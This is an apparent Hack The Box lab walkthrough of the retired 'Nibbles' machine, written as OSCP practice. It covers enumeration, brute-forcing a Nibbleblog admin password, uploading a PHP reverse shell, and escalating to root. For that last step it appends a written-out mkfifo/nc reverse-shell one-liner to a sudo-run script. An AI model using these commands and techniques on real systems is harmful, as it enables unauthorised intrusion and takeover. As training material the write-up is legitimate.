OSCP PREPROTİONS – HTB Nibbles

Nibbles machine is a vulnerable machine with Linux operating system among retired machines. We are expected to find these vulnerabilities and obtain the user and root flags.
First, we check the services and ports running on the target machine;


Classic Scan

Full Scan

As a result of the nmap scan, we see that ports 22 and 80 are open.
OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 is running on port 22
On port 80, http Apache httpd 2.4.18 ((Ubuntu)) is running.
Since port 80 is open, we provide enmuration through the browser.

Hello World! We come across the text. We could not get much information with Wappalyzer.
We are looking at the source code;

“/nibbleblog/ directory. Nothing interesting here!”, which sounds interesting to us.
Before going to the directory, we scan it with gobuster to see if there are other directories.

We go to the directory given to us in the comment line where we could not find interesting information. We perform the enumuration

We examine the source code

We could not obtain valuable information
In this directory, we perform a directory scan with gobuster.

We find valuable directories. We perform enumuration on these directories.
We find username in /content/private/users.xml directory.

v4.0.3 version information.

We go to admin.php

Here we try default passwords but we cannot log in successfully.
We try bruteforce attack with Burpsuit;
After opening Burpsuite and setting the Proxy setting, I send it to the Intruder section

Since we will try bruteforce on the password side in the Intruder section, we select the password part as payload and continue.
Then come to the payload section, select simple list, select passwordlist.txt and then start the attack.

After the Attack starts, we wait and try to find the words that make the difference

We try the nibbles password and we were able to log in 😊

After logging in, we do enumuratione (the purpose of this is to be able to upload files and get revershell)
From the Plugins tab, we see the area where we can upload in the My image section

In the Browse section, we try the php revershell ini prepared by pentest monkey.
We change our IP address and upload our file to the server.

We uploaded the opposite side
We go to the /private/plugins/my_image/ folder in the /content/ directory that we detected with Gobuster, we see the image.png file, we start revershell with ncat before clicking.

Click and we got our revershell

We were able to get our user flag
We need to upgrade from our user user authorization to root authorization, we provide enumuration inside.
With the sudo -l command we list the files that can be run with sudo authorization.

We could list detailed privilege escalations by running a script like LinEnum or LinPEAS for privilege escalation.

We have also listed the file that we know is running Root. In order to get Shell from this file, we can add a revershell script to the end of the file so that the rest of the file can remain intact in a normal way.
To add a single line to monitor.sh;

echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 4444 >/tmp/f’ | tee -a monitor.sh
We can write the script this script will write our script at the end of the monitor.sh file

After writing the script, let’s listen to the destination port with rncat before running the file

We got our Shelimiz but since I didn’t run it with sudo authorization, we stayed in the nibller user again 😊

We run it immediately with Sudo
We were able to get root

This way we were able to get our root flag.